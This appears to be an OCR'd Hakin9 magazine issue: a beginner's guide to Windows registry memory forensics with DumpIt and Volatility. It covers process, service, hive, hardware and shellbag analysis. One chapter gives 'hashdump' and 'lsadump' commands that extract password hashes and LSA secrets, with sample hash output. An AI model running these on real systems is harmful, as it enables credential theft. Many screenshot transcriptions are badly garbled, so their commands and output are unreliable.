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Dear Hakin9 Readers! 

We give you the new Hakin9 issue about practical protection. Less theory, more practice! 

What will you find here? 

We recommend you the article of Mr Mirko Raimondi about Voice over Internet Protocol hacking. 
VoIP is getting more and more popular way of voice communications, replacing the analog signal- 
working telephones. New technologies, new threats! 

And have you ever been interested in steganoghaphy? Mr Sarang shows us how to encode the files 
they would look like another file than they are in reality. This is not just a trick - it is better to know 
that the hackers can send a hidden Trojan in file looking like image, video, message... 

We have also a pleasure to publish an article by Mr Thanglalson Gangte, who took a 2nd position 
in our Best IT Blog Challenge! Have you heard about Pretty Good Privacy? It’s an asymmetric 
encryption algorithm. Mr Gangte shares his foundings about PGP which let us encrypting our emails. 

This and much more in this Hakin9. Wish you a good reading! 


Hakin9 Magazine Team 
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Windows Registry Forensics (WRF) with 
Volatility Framework Beginners Guide 

by Kapil Soni 

This is guide especially for beginners who wants to learn about Windows Registry Forensics. 
Throughout this book you will learn how to do forensics and investigate Windows Registry. 
Less Theory - More Practice. 

Before starting discussion about tools which is used in windows registry forensics, I would like to inform 
that what we are going to do & what we want to do. 

In this book we are going to analyse memory which will be in 2 way i.e. live memory forensics & dumped 
memory forensics. We’ll use two tools in this book for experimental purpose. Memory forensics is becoming 
very essential & useful task in digital forensics as well as incidence response. 

When system is infected & compromised by attacks or viruses, investigator need to perform analysis & 
forensic investigation of particular system. 

In this book I am going to demonstrate forensics analysis by using dumped memory forensics. 

Firstly I would like to tell that what actually memory is or what it contains? 

Memory contains lot of important as well as confidential information about users & system. Why we need 
memory forensics because to tackle with memory malware, criminal cases, intrusion analysis etc. 

All activities which are done by attacker like any malicious or harmful activity are analysed by memory 
forensics. All these activities are stored in format of logs or data. Sometimes such things are also encrypted 
we need to perform analysis on basis of nature of data. 

Let’s begin our demonstration with tools. 

Dumplt 

Dumplt is a free memory dumping tool for Windows by MoonSols that can dump all the memory in just one 
click. Dumplt is a very powerful and useful tool for dump memory on Windows platform. Dumplt is a fusion 
of two tools, Win32 and Win64 combined into one executable. 


Mi EADumpItece 


Dumplt - ul .3 .2 .20110401 - One click memory memor 
Copyright <c> 2007 - 2011, Matthieu Suiche <http: 
Copyright <c> 2010 - 2011, MoonSols <http://www.rn 


Address space size: 205520896 bytes ( 

Free space size: 1780297728 bytes < 

* Destination = \??\E:\UIN-HMRDNC0M05T-20110723 

— > Are you sure you want to continue? [y/n ] y 
+ Processing... Success. 


Figure 1. Dumplt Memory Dumper 


7 


Secure Coding 


Note 

After all if you are having any problem in installation and usage, I recommend watch this video tutorials of 
How to use Dumplt: http://www.youtube.com/watch?v=SEs4ZAolED0. 

Volatility Framework 

Volatility framework which integrates almost digital forensics tools within it. The Volatility Framework is a 
completely open collection of tools, implemented in Python under the GNU General Public License, for the 
extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed 
completely independent of the system being investigated but offer unprecedented visibility into the runtime 
state of the system. The framework is intended to introduce people to the techniques and complexities 
associated with extracting digital artifacts from volatile memory samples and provide a platform for further 
work into this exciting area of research. 

Volatility supports memory dumps from all major 32- and 64-bit Windows versions and service packs 
including XP, 2003 Server, Vista, Server 2008, Server 2008 R2, and Seven. Whether your memory dump 
is in raw format, a Microsoft crash dump, hibernation fde, or virtual machine snapshot, Volatility is able to 
work with it. We also now support Linux memory dumps in raw or LiME format and include 35+ plugins 
for analyzing 32- and 64- bit Linux kernels from 2.6.11 - 3.5.x and distributions such as Debian, Ubuntu, 
OpenSuSE, Fedora, CentOS, and Mandrake. We support 38 versions of Mac OSX memory dumps from 10.5 
to 10.8.3 Mountain Lion, both 32- and 64-bit. Android phones with ARM processors are also supported. 
Support for Windows 8, 8.1, Server 2012, 2012 R2, and OSX 10.9 (Mavericks) is either already in svn or 
just around the comer, so stay tuned for our next release! Some advanced features of Volatility Framework is 
that provides tools for memory malware analysis, android memory analysis. 

Chapter 2 - Basics of Memory Image (Dumped) 

Dumped memory contains a lot of information which will be very useful as per forensic prospective. 

First of all we have to know about which memory dump we are going to analyse whether it is of Windows 
XP or Windows 7 because both are having different architecture. Some plugins of volatility will work 
on Windows XP not on Windows 7 & vice versa. First of all make sure, you have volatility framework 
standalone and you have a dumped memory file for forensics. 

So let’s start some practical things. 

Image Information 

In this section, we will see how to check basic information which contained in image (dumped file of 
windows XP). I’ll use volatility framework to perform analysis of image. So I have “Volatility Framework 
Standalone Version” for Windows, and a dumped memory image of Windows XP. 

How to get Image Information from image, Use this “imageinfo” plugin in your command prompt as follows: 

Volatility.exe -f WinXP.raw imageinfo 


Where, 

Volatility.exe - is volatility framework that you can download from the internet. 

-f- File Location/File Path 

WinXP.raw - Dumped Windows memory image 

Imageinfo - Volatility Framework plugin for check image information. 
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Figure 2. Image Information Gathering 

After run “imageinfo” plugin you can see two profile suggested by it. Means it may be WinXPSP2x86 or 
WinXPSP3x86 profile containing this dumped image. I know my profile is WinXPSP2x86 so I’ll use it. 

You can figure out exact profile of dumped image by “kdbgscan” plugin, just use it instead of imageinfo and 
it will show you other interesting information. 

Process Analysis 

Process analysis is another most important part in memory forensics or in investigation because processes 
contains a lot of secrets and useful information as per forensic prospective. Take an example of memory 
malware analysis. Some malwares like Zeus, Lagma, Coreflood etc. To analyse such types of malwares, 
process analysis plays an important role. By analysing processes we can find out malwares which are there 
in memory. So again come back to our Windows registry forensics, we will discuss briefly about memory 
malware analysis in my next book. 

To scan processes present in dumped memory image following plugin is used: 

Volatility.exe -f WinXP.raw psscan 


Where, 

Psscan - Process scan plugin for print all the processes that was running on the system when image created. 


e h. Administrator: C:’\W/mdows \ system 32 \cmd. ex e 

D:\MEMOR¥>Uo latility.exe -f UinXP.raw psscan 
Uolatility Foundation Uolatility Framework 2.3.1 

Offset (P> Name PID PPID PDB Time created 


Ix039c3da0 suchost.exe 1448 680 0x09b401a0 2013-12-28 08:25:59 UTC+0000 
Ix039c8020 rundll32.exe 1380 1508 0x09b402c0 2013-12-28 08:26:36 UTC+0000 
Ix039c8ae8 alg.exe 1296 680 0x09b402a0 2013-12-28 08:26:35 UTC+0000 
Ix039cf 528 wmipruse.exe 684 920 0x09b40340 2013-12-28 08:30:48 UTC+0000 
Ix03a68020 csrss.exe 612 372 0x09b40040 2013-12-28 08:25:45 UTC+0000 
Ix03a77cl0 explorer.exe 1508 1428 0x09b401c0 2013-12-28 08:25:59 UTC+0000 
Ix03b55cl0 imapi.exe 1896 680 0x09b40100 2013-12-28 08:26:38 UTC+0000 
Ix03ba3af 8 TPAutoConnect .e 1716 960 0x09b40300 2013-12-28 08:26:37 UTC+0000 
Ix03bac020 umtoolsd.exe 452 680 0x09b40200 2013-12-28 08:26:28 UTC+0000 
Ix03bf 17b8 wuauclt.exe 532 1152 0x09b40320 2013-12-28 08:28:01 UTC+0000 
Ix03bf cle0 Dumplt.exe 1764 1508 0x09b40240 2013-12-28 08:35:02 UTC+0000 
Ix03c4c020 smss.exe 372 4 0x09b40020 2013-12-28 08:25:42 UTC+0000 
Ix03c4ea80 spoolsu.exe 1696 680 0x09b401e0 2013-12-28 08:26:01 UTC+0000 
Ix03c51020 seruices.exe 680 636 0x09b40080 2013-12-28 08:25:48 UTC+0000 
Ix03ce2da0 suchost.exe 172 680 0x09b40180 2013-12-28 08:26:19 UTC+0000 


Figure 3. Process Scanning 


In above image you can clearly see that after psscan plugin shows all the processes printed out with their 
corresponding process IDs and Offset. (These offsets and Process IDs are used in malware analysis. 
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Services Analysis 

Services analysis is yet another important analysis for investigator as per forensic prospective. By services 
analysis, investigator easily knows which services was running last time on the system and which services 
was not running, even you can clearly see the process IDs of every service. Sometimes investigator detect 
unwanted services that was running on system which are not related to system or its default services, it may 
be activated by Trojan, RAT, or by other malicious program. 


Offset: 0x6ea600 
Order: 243 
Process ID: 904 

Service Name: UMuare Physical Disk Helper Service 
Display Name: UMuare Physical Disk Helper Service 
Service Type: SERUICE_UIN32_0UN_PR0CESS 
Service State: SERU I CE_RUNNI NG 

Binary Path: ,p C:\Program Files\UMuare\UMuare Tools\vmacthlp.exe ,p 

Offset: 0x6eaGc8 
Order: 244 
Process ID: - 
Service Name: vmxnet 

Display Name: UMuare Ethernet Adapter Driver 
Service Type: SERU I CE_KERNEL_DRI UER 
Service State: SERU I CE_S TOPPED 
Binary Path: - 


Figure 4. Scanned Process Snippet 

In above image you can see, after service scan (svcscan) we get brief description about services and easily 
knows that whether they are started or stopped. Analysis of these services are very important because 
investigator can found malicious activity or evidence from such analysis. 

In above image you can see offsets of the processes with correspondence order number and process ID of 
services as well you can clearly see service name, display name and service type that shows the type of 
service, means which service runs by user or system, then you can see service state, that shows you service 
was running or not, if it indicate stop so service was stop in the system. Then you can see path of the service 
from the service was executes. 

Chapter 3 - Registry Basics 

Registry is the one of most important part in Windows operating systems. Registry managed in hierarchical 
form and stores configuration settings of users and systems on Windows operating system. The kernel, 
device drivers, services, SAM, user interface and third party applications can all make use of the registry. 
The registry also provides a means to access counters for profiling system performance. 


Hives 

Registry managed in hierarchical form in Windows to manage settings and data in proper way. 

Windows operating system have different 2 hives for managing settings like Machine, Root, Security, User, 
and Default. Hives are the root directories that stores subdirectories called keys. In other words, integrated 
hierarchical database, branches of the registry are actually stored in a number of disk files called hives. 

Some hives are volatile and are not stored on disk at all. An example of this is the hive of branch starting at 
HKUMYHARDWARE. This hive records information about system hardware and entry is created each time 
when the system boots and performs hardware detection. 

Not all hives are loaded in one time, when system or application need a hive so that it will load instantly. 

*See your hive list by type “regedit” command in run box. Hives name shows in below table and shows their 
corresponding short form and work. Different hives contains different -2 types of value or settings. 
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Table. 1. HKEY specification 


Name 

Abbreviation 

Contents 

HKEYCLASSESROOT 

HKCR 

Information used by programs for file association and for sharing information. 

HKE YCURRENTU SER 

HKCU 

Settings and configuration for the current user. 

HKEY LOCAL MACHINE 

HKLM 

Settings and configuration for all users. 

HKEYUSERS 

HKU 

Settings and configuration for all users on the computer; the information in 
HKCU is copied from this hive when the user logs in. 

HKEYCURRENTCONFIG 

N/A 

Hardware information about the PC’s resources and configuration. 


Volatility Framework provide some plugins to gather information about hives. These plugins work frequently 
and ease to use. 

Hivelist 

Hivelist plugin provide all the hives list that are available in registry memory. It shows the virtual addresses 
or offset of registry hives in memory and the full path of corresponding hive on Windows registry. 

Hivedump 

Recursively list all subkeys in a hive, use the hivedump command and pass it the virtual address to the 
desired hive. 

Hivescan 

If you want to find the all physical address in Windows registry hive. This plugin of volatility framework 
isn’t generally useful by itself because hivelist provide better work done than it. 

Keys Information 

We already discussed about it in hive section. In other word or take an example of it - Folder A contains 
Folder B and Folder B contains folder C so in registry case folder A is the hive then folder B is the key and 
folder C is the sub-key. Let another example: Hives » Keys » Subkeys. Means hive contains keys and keys 
contains subkeys. In below image you can clearly understand what keys are. 



Figure 5. Windows Registry Editor 
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In above image you can clearly see HKLM hive contains HARDWARE, SAM, SECURITY, SOFTWARE 
Keys and these key contains subkeys as shown in image. 

Navigating Keys and Subkeys in Registry 

Volatility Framework provides very useful and easy way to navigate keys and Subkeys in memory by 
“printkey” plugin. Printkey use to display the subkeys, values, data, and data types contained within a 
specified registry key. Let’s take an example of it, if you want to print all the keys that available in the 
system hive so: 


Volatility.exe -f WinXP.raw -prof ile=WinXPSP2x8 6 printkey -o hive_offset 

In place of hive_offset you have to put hive’s offset/virtual address of the hive that you can found with the 
help of hivelist plugin or command. After this you will get all the keys that hive contains. Now in more deep, 
if you want to locate under Key means you want to locate subkeys under keys so for it you have to use -K 
then key name. For example: 

Volatility.exe -f WinXP.raw --prof ile=WinXPSP2x8 6 printkey -o hive_offset -K Key_Name 

Some keys and subkeys contains values that stores configuration settings by system, users and network. 
These values may be in encrypted form so that cannot be easily understandable. Below image shows you an 
example of locating keys and subkeys in Windows registry. 


D:\P1Et10KY olatilitij.exe — F UlciXP. raw --prof lie =WinXJ J KF2kBb print Key -c BxelUJbbbW 
volatility Foundation Volatility Framework 2.3.1 
Legend: CS> = Stable = Volatile 


Reg is- try: User Specified 
Key name: $$$FKOTO.HIU <S> 

Last updated: 2fl13-12-2R 0R:25:21 tlTft+flURB 
Subkeys : 

<E > Gontro lEctGOl 

<5 > ControlSet002 

<£ > LactKnounCocdFecovery 

<S> Mo untetlDe vices 

<£> Select 

<S> Setup 

(£> WPA 

<V> CurrentControlGet 
Values : 

D: ^MEMOR¥ >Uo lat ility .exe — f LJinXP. ran — pref ile =1J inXPSP2x8& print bey -o 0xe 1035 b&0 -K Contro l£et001 
Volatility Foundation Volatility Franc work 2.3.1 
Legend: C£> = Stable = Volatile 


Registry: User Specified 
Key name: Centre ISetHUl <S> 

Last updated: 2013-13-24 00:15:29 UTC+OOOO 

Subkeyc : 

<S> Control 
<£> Enun 

<S> Hardvai'e Frufiles 
{£> Seruiees 


Figure 6. Uses of PrintKey Plugin 


Chapter 4 - Hardware Information 

Gathering information about hardware from Windows operating system by registry is good idea. 

Windows OS stores hardware and BIOS information in registry that helps investigator to find information 
about BIOS and hardware which are connected to the system. In under of HKLM hive, HARDWARE 
key contains information about hardware and BIOS. I have a dumped image of Windows 7 so I’ll use this 
dumped image to collect information about hardware and BIOS. 


CPU Identification 


Windows registry is the perfect way to identify central processor unit. In this part we will gather information 
about CPU. Registry hides value’s data in encrypted form and unencrypted form. With the help of hivelist 
plugin you will get virtual address/offsets of HARDWARE Key under HKLM as shown below figure. 
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D:SMEI10R!f Volatility .exe -f Windows 7. raw — prof ile=Win7£Plx86 hive list 
Lnlatilifiy Fmindatinn UnlaHlity Ppan^uni'k 2.3.1 
Virtual Physical Name 


0xb62ad5e0 0x200u45e0 \??NC : NS ys Lem Eulumie I nf uniat ImiNSysuauIie . live 

0xb7a922c8 0xldf d42c8 \??\C:\Users\A jay Mehra\flppDataSLocal\Mici‘osof t\Windows\UsrClass .dat 
0xb86359d0 0xlbe769d0 S??\C:\Users\A jay Mehra\ntuser.dat 
0x8cc0c008 0xG2a8f008 [no name] 

0x8cclc008 0x52ece008 \REGISTRV\MfiGHINE\SVSTEf1 
0 x9 c c E 00 08 0x4ft02000 SREG I £ T R9 VMfi CH I N E VH A RDf J A HE 

0x8f 779008 0x3dEa2008 \??\C:\Windows\£eruiceFrof iles\NetworkSeryice\NTUSER.DAT 

0x91230490 0x3deba490 \??\G : \Windows\Sero iceProf ilesVLocalSeru iceNNIUSER . EAT 

0x98158398 0x12900398 \SystemRoot\System32\Conf it^NSflll 

0x981589d0 0xl29009d0 \SystemRoot\System32\Conf igSSECURITV 

0x98feE00R 0x87900008 SSystemRnntSEystemRS^Gfinf H tjXDFFAIITrT 

0x981e9008 0x0b600008 \SystemRciot\£ystem32\Conf igSSOFTWfiRE 

0xalfd8008 0x2500f003 \Beuice\HarddiskVoltimel\Boot\BCD 


Figure 7. Hives list with hivelist plugins 


Copy the virtual address of HKLM/HARDWARE and navigate it with the help of “printkey” plugin -o use 
for offset/virtual address. 


D:\MEMORV Volatility .exe -f Windows?. raw — prof ile=Win7SPlx86 printkey -o 0x8cc50008 
Volatility Foundation Volatility Framework 2.3.1 
Legend: <S> = Stable = Volatile 


Registry: User Specified 
Key name: HARDWARE <S> 

Last updated: 2014-01-18 09:26:43 UTC+0000 

Subkeys : 

<S> ACPI 
<S> DESCRIPTION 
<S> DEVICEMAP 
<V> RESOURCEMAP 


Figure 8. Locating Keys and Subkeys with PrintKey 


Now in above image you can see, some subkeys that managed Under HARDWARE Key. Now to gather 
information about hardware and BIOS so you have to navigate DESCRIPTION/System subkey as shown in 
below image. 



Figure 9. Locating Hives for Hardware Information 


As you can see in above image we get little bit information about system by registry. You can see 
at downside in image SystemBiosDate, SystemBiosVersion, Identifier, BootArchitechture and 
other information. Now suppose we want to gather more information about CPU so we’ll navigate 
“CentralProcessor”. And if we want to gather more information about hardware and BIOS so we have to 
navigate “BIOS”. 

First of all we’ll navigate CentralProcessor subkey to gather information of CPU and vender. So by using 
given command you can navigate it: 


Volatility.exe -f Windows7 --prof ile=Win7SPlx8 6 printkey -o HKLM_Virtual -K DESCRIPTION\System\ 
CentralProcessor\0 


After executing this command you can clearly see about architecture of OS, processor name, vendor 
identification and frequency of processor. In my case, processor is Intel Pentium B960 @2.20GHz and in 
MHz it was 2195 accurately. 
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p:-^hT»KVWulaLili.Lv-cxe ~l WiinluwLrV.raiu — pro File -UinVSf'ljrHb yriiiLluru ti UjrtiL-LtBUHa ~K BfcSI BJH I FTIOHSa YTitirnSCriitralF roctrsEurMI 
JdlrttiliCjj Frtundfltinn Uci 1 nt i 1 i t v Fu'nniUMtv-fc 2.3.1 

Lfl^nrt: <£> - Stable <U> = ValatllB 


Ihi y is try : User U jjb s i Ir i ml 
He u nane : 0 t£> 

Last updated: 2BM-H1-M 09 =26 M3 UTOM0B 

inhltfiy*: 

]«Ijues - 

R.FG_RrNAF!Y i3npi|ni nen t [fifjvv-n.iiiHrin : fKJ 

■J itUBBUBUBB lit) OB HU HU UH BB BU BU W DM HD HH BB tJB BU UB ..... 

KEG_5Z Identii ier : (S) xO& Fnniljj 6 Model 42 Stepping 7 

REG FULL REE Ml BCE DESCJttPTOF Configuration tat a = <6> 

KECJ_3E FrrjLCEvnrHflBnSLpin.i : tS > liiLelCm FeiiLiiuit K> BFU BtffiH S 2. 2 UGH.: 

SFG_S7: Uenrfd^THentifirr : <Ki Crnninrlntrl 

REG DLIORD F««iuivSirL : <S> 3fc9?93E6¥S 

RIG_DUOnD "Tlflz - (SJ 2190 

ITCG_RINflRY UiMflAtre Signature : ^K1 

J ;h.BBUUWU BB UB BU BU BU 3b BB BU BB A... 

RrG.nUOnD IJyUntr, Status : C51 2 

RIG BINARY Previous Update Signature : < 5 > 

itxUBHUBUBU US BB HU BU Zb BB S.1M BU £... 

RFG_TjUOHD Pl.itfnm Hi : £E> 1ft 


Figure 10. Gather Information about CPU 

Hardware and BIOS Identification 

In this part we’ll look at how to collect information about compromised machine. When some hardware or 
device driver was detected by Windows registry, automatically Windows create the registry values in HKLM 
hive. This is good way to collect information about compromised machine. 

Let’s gather information about compromised machine with the help of dumped memory image. We have to 
just navigate on the right way with the help of printkey plugin: 

Volatility.exe -f Windows7.raw -profile=Win7SPlx86 -o HKLM_VirtualAddress -K DESCRIPTION/System/ 
BIOS 

After this command you will get important information about hardware and BIOS that uses by compromised 
system as shown in below image. 



Figure 11. Gather Information about Hardware and BIOS 


Note 


Small Computer System Interface (SCSI) is a set of standards for physically connecting and transferring data 
between computers and peripheral devices. 

You can get some interesting information from here. Here you can find out BaseBoardManufacturer means 
notebook manufacturer, BaseBoardProduct number, BaseBoardVersion and now on BIOS, the BIOS release 
date, BIOS Vendor, BIOS version you can get from here easily. After that System Family, Manufacturer, 
Product name even you can get serial number, and system version from here. 


SCSI Devices 

Now if you want to identify or gather information about SCSI devices like Harddisk devices and DVD- 
Writer and so on, so following command will help you to locate SCSI devices. 
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Volatility.exe -f Windows7.raw -prof ile=Win7SPlx8 6 -o HKLM_VirtualAddress -K "DEVICEMAP\Scsi\Scsi 
Port 0\Scsi Bus 0" 


MUWCiRVJUolfttility.exe f Windows - ?. rm prof d.lc-WirrT’Sl’lxOG print he jj a 0xGc c 50800 H ''DEU I CUHA T'VSc = ivS c s i Port (Mcsi Ells 6' 
Ifi Inti lit y Frjnrn1.1T. -inn Ifnl.jtt Hty Tis-uwyumrh 2.1.1 
Luyunii: - SUbli <V? - UuWils 


Ifaiyistrsi: Uuur Spot if iwd 
Ihv n«r*e: Sc si Bus 8 CIO 

Ijist npriiitrd: 2R1H-B1-LB R4=2C.:5-< IJTOflFIHn 
Jrl ?.*& 

<V> Irtj’UBt III B 
<W> Iftrnst Id 1 


Figure 12. Locating SCSI Devices 


If any SCSI devices are connected to the system so you can find entry of the SCSI devices here. In above 
image you can see there are two Target IDs 0 and 1. If there is more Target IDs it means more SCSI 
devices was connected to the system. If you will navigate these Target IDs then you will get SCSI devices 
information. As shown below image: 


D : ^EHQBU>Vo Lati lit y-. chc -f Uindowa? . raw — prof ilc-Uin76PiKflt printiicy -^n 0xBcc£000B -K "DEVI GEHflPSEcs iSScsi 
Port 0\Scs.i Ous 0\fftr?et Id OSLoy icftl Unit Id 0' 1 

IJn tri I. i 1 i l.y Fmimlril. imi U ri 1 *i I. i 1 i I. m FnriniMiJii'rJi 2.3.1 
Legend: CS > = Stable OJ> = Ualatile 


registry: User Specif led 

[Key name: Luyiudil Unit Id 0 <U > 

f.iiRT: updated: 2HE4-PII-IB 09:26:44 11700000 

tiubkays : 

Ua lues : 

lIFfijKZ IeIktiL if ini' : C U > HTRR4' i 

EEG_SZ Type - Oi> Diu EPer ipheral 


Figure 13. Locate SCSI Devices with their Serial Number 


n ; MIFWOEV >Unl at 1 1 1 ty.exe -f Ulnrlnus:?.^™ — pwif i 1 r=LJ 1 nVKPJ xBfi prlntkey -n fi* -K "RFUI CFMflPsSns l\Srs^ 
Port 0\£csi Blis BMai^get Id l\Logieal Unit Id B” 

Volatility Foundation Volatility Fra no work 2.3.1 
Legend: ~ Ktablc <VJ _ Volatile 

Registry : User Specified 

Key name: l.nglnal Unit lei fl fU> 

Last updated: 2014-01-16 69:26:54 UTC+BOBO 

y ubltcyo : 

Values : 

REG 3E Identifier : <V> lip DU DR AM GI50N 

HFG_SZ Type : CrifinmPei'lphRral 


Figure 14. Locating SCSI Devices 2 

Chapter 5 - Hash Dumping and LSA Secrets 

In this chapter you will learn about hashes and LSA Secrets and some dumping techniques by Volatility 
Framework. 

Hash Dumping 

Windows SAM stores password in the unreadable format means in encrypted form or in the form of hashes. 
Windows user’s password stores in the hash form in the SAM database. Windows uses for hash functions 
LM hash and NTLM hash for securing users password. When a user put their password for login so 
Windows convert this password in hashes and match with the hash that stores in SAM database. If the hashes 
are matched then user will be login. And in case the hashes doesn’t matched so Windows will give error of 
incorrect password. 

Volatility framework provide a very good and useful plugins to dump all the hashes from SAM database. 
Investigator can dump all the hashes and decrypt them but sometimes decryption hashes takes time. So for 
dump hashes what we need?? 

Volatility Framework provide a plugin namely “hashdump” for dump hashes but we have to fill all the 
parameters that are necessary for hash dump. For it we need virtual address or offset of SAM hive and 
System hive that you can get easily with the help of “hivelist” plugin. 

In below image you can see i hi-lighted SAM and System with their corresponding virtual addresses or 
offsets because for hash dumping we have to use them with necessary parameters. 
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D:\MEMORV>Uo latility.exe -f UinXPSP2 .unen — prof ile=UinXPSP2x86 hiuelist 
Uolatility Foundation Uolatility Framework 2.3.1 
Uirtual Physical Name 


0xelc49008 0x03 6 dc 008 NDeuice\HarddiskUolumel\Documents and Sett ings\LocalSeruice\Local Sett ingsNApplicat ion 
DataSNicrosof tSWindowsSUsrClass . dat 

0xelc41b60 0x0401 0b60 \Deuice\HarddiskUolumel\Documents and Settings\LocalSeruice\NTUSER.DAT 

0xela39638 0x021eb638 \Deuice\HarddiskUolumel\Documents and Sett ings\NetworkSeruice\Local Sett ingsNApplicat i 
on DataNMicrosof t\Uindows\UsrClass .dat 

0xela33008 0x01198008 \Deuice\HarddiskUolumel\Documents and Sett ings\NetworkSeruice\NTUSER.DAT 

0xel53ab60 0x06b7db60 \Deu iceNHarddiskUo lumelMJI ND0US\systeri32\conf ig\sof tware 

0xel542008 0x06 c 48 008 \Deuice\HarddiskUolumel\UIND0US\systeri32\conf igNdefault 

0xel537b60 0x06ae4b60 SSystemRoot\System32\Conf igSSECURI TV 

0xe 15 44008 0x06c4b008 \Deuice\HarddiskUolumel\UIND0US\systeri32\conf ig\SAM 

0xel3ae580 0x01bbd580 [no name] 

0xel01b008 0x01867008 \Deuice\HarddiskUolumel\UIND0US\systeri32\conf ig\system 
0xel008978 0x01824978 [no name] 

0xelel58c0 0x009728c0 NDeuice\HarddiskUolumel\Documents and Sett ings\Administrator\Local Sett ingsNApplicat io 
n DataMlicrosof t\Windows\UsrClass . dat 

0xelda4008 0x001 6 e 008 \Deuice\HarddiskUolumel\Documents and Settings\Administrator\NTUSER.DAT 


Figure 15. Hi-Lighted SAM and Systems Virtual Address/Offsets 


Now we have virtual addresses of SAM and System hives so we will use them for dump hashes. 


Volatility.exe -f WinXP.raw --prof ile=WinXPSP2x8 6 hashdump -y system_virutal -s sam_virtual 


You have to pass system virtual address with -y and SAM virtual address with -s. 


D:\MEMORV>Uo latility.exe -f UinXPSP2 . unen — prof ile=UinXPSP2x86 hashdump -y 0xel01b008 -s 0xel544008 
Uolatility Foundation Uolatility Framework 2.3.1 

Administrator :500:e52cac67419. " i224a3bl081 31 a6cb6d:8846f 7i 81 bll7ad06bdd830b7586c : : : 

Guest =501 :aad3b435b51404eeaad3b435b51404ee :31d6cfe0dl ' i931b73c59d7e0c089c0: : : 

HelpAss istant =1000: 4e857c004024e53cd538de64deda ''5b:842b4013c45a3b8f ec76ca54e5910581 : : : 
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8i n 385a61425f c7874c3268aa249eal : : : 


Figure 16. Dumped Hashes from Windows Registry 

Now we have dump hashes of all users including administrator. 


LSA Secrets 

That’s a beauty of memory forensics. We can collect a lot of information about compromised system in 
investigation. Before we start dumping of LSA secret we have to understand about LSA Secrets. So let’s 
start understanding LSA Secrets, may be many of you knows about it but this is a beginners guide so start 
it from beginning. 

LSA Secrets is a special protected storage area for important data used by Local Security Authority (LSA) 
in Windows. That storage area stores important data like Local Security Policies, Auditing, Authentication, 
Logging users on the system, Storing private data as well it stores system’s and user’s sensitive data in 
secrets. Access of this secret data only available for system. When Microsoft launched Windows, means 
in starting LSA stores cached domain records but as time goes away Microsoft’s developer made a lot 
implements on LSA Secrets then now LSA Secrets stores Internet Explorer passwords, RAS connection 
passwords, SQL and CISCO passwords, SYSTEM account passwords, private user data like EFS encryption 
keys, and a lot more. 

Some directories where LSA secrets stored is hkey_local_machine/ security/policy/ secrets and the parent 
directory HKEY_L0CAL_MACHiNE/security/poiic y contains additional data, necessary for accessing and decrypting 
the secrets. 

Dumping LSA Secrets 

Volatility framework’s plugin “lsadump” provide great facility to dump LSA Secrets from Windows 
registry. To dump LSA Secrets we have to pass necessary parameters of Systems and Security’s virtual 
addresses/Offsets. 

Volatility.exe -f WinXP.raw -prof ile=WinXPSP2x8 6 lsadump -y system_of f set -s security_of f set 
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111 :M1hnt]HV>Un lat i lit u.pvr -¥ Mi nX FK YV. .utnfim — in-rti If 

*=UnnXl'liP7xKh Ixadiinii -u MyfllWIhHHH -s WxHlhUVhhH 1 

Volatility F 

’oumdat ion Volatility FronctfoHf 2.3.1 




LiRTHT 1 MEBOHB_1320i53E-8DA3-4e8e-B27fl-0D838223A588 
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80 c9 63 7f 03 67 cfc 01 



. _e_ _ar_ . 

SC LmHosts 





_SC_upnpliost 





29edG7c2 3bQ 

2 4114 0117 Ee2i?ed4c40i S A LEHII ELPA CCOUNT 



_£C_HpcSe 





HHH:i:t43ii-FVZ 

S-4firi7-h1 fih-rl7hrt1 VflHhhVh-HRmfitft Drs kt.miHfi 1 pA ss i Etflnt Anmnnnt 
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66 00 67 00 23 03 34 00 4a 90 7a 00 89 

09 

44 00 

c.g.tt.4.J.E.V.E. 

0X0000001 @ 

55 00 63 60 35 00 36 06 1 90 7a 00 00 

09 


U .c .5 . 6 . r_z 

_SC_HGETC 





_£C_ALG 






A F3 V -4bf f - A ERA -DA 6 3 E FHEEE0A > 
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■ . .0.... 

0X0G000010 
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Figure 1 7. Dumped LSA Secrets from Windows Registry 

You can see dumped LSA Secrets in above image. This data is in encrypted form. There first 12 byte 
contains metadata and remaining data is in encrypted form. 

Note 

I want to suggest you, if you want more brief information about LSA Secrets so at least go once these articles. 

• http.V/www.passcape. com/index.php?section =docsys&cmd=details&id=23 

• h ttp.V/moyix. blogspot. in/2008/02/decrypting-lsa-secrets.html 

Chapter 6 - Shellbags Analysis 

One of the most important part in Windows registry forensics is the Shellbags analysis or forensics. 

Shellbags analysis is important for Windows registry investigator because investigator can find a lot of 
information and collect evidence from registry. Shellbags contains most useful data that helps to investigate. 

Introduction to shellbags and its analysis 

Microsoft Windows uses track users viewing preferences means size, icon, view of folder using Windows 
explorer, this call Shellbags information and this information stores in Windows registry at different -2 
places. Shellbags is all about directories. If somebody open or close a folder so this log/entry also stores 
in Shellbags even if somebody delete the folder so this entry you can see in registry, which means that 
investigator can use to enumerate past mounted volumes, deleted fdes, and user actions. 

You can find Shellbags information in registry on these locations: 

• HKEY\_USERS\{USERID}\Software\Microsoft\Windows\Shell\ 

• HKEY\_USERS\{USERID}\Software\Microsoft\Windows\ShellNoRoam\ 

Shellbags information stores in registry in encrypted form. I suggest you to look at once on “Using Shellbags 
Information to re con str uct user activity” research paper. 

Now comes on Volatility framework, It is an awesome framework that provide Shellbags analysis by just one 
plugin “shellbags”. Shellbags plugin extract all the shellbags information into the Windows registry. 

The output of this plugin is easily readable by user. As shown in below example: 

Volatility.exe -f WinXP.raw -prof ile=WinXPSP2x8 6 shellbags 
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0 : >Uo lability . ckc -f UinXP.i-au — profile -Win KPS P2x8 6 ohcllfaags 
olatilitu Foundation Uolatilitp Framework 2.J.1 
canning for registries 

at her in y olicllbag iterva and building path tree . . . 

Illstrv : NDeuiLeMiurdilisliUu lunelSDuuiineii Ls and Sell iimsNfiilniii islrdlur\NTJSER .DAT 
- Saf tiFaroCMici'ocoPt\WindowcCShBll\BagcCiSDeel<top 
Cast: updated: 2013-12-26 09:27:32 IHC+0FIHO 

llalue File Name Modified Bate Create Bate 


Access Bate 



File fittr 

2013-12-25 

19=40: 

26 

UTC+0000 

ARC 

2013 12 26 

04:09: 

: 40 

UTC * 8000 

ARC 

2013-12-24 

09=32 : 

:2b 

UTC *0000 

D1H 

2013-12-20 

11:38: 

: 10 

UTC *0000 

ARC 

2013-12-18 

1B:34: 

: 12 

UTC +0000 

ARC 

2013-12-19 

0b =57: 

54 

UTC *0000 

AHC 

2013-12-19 

08:00: 

:ZH 

UTC *0000 
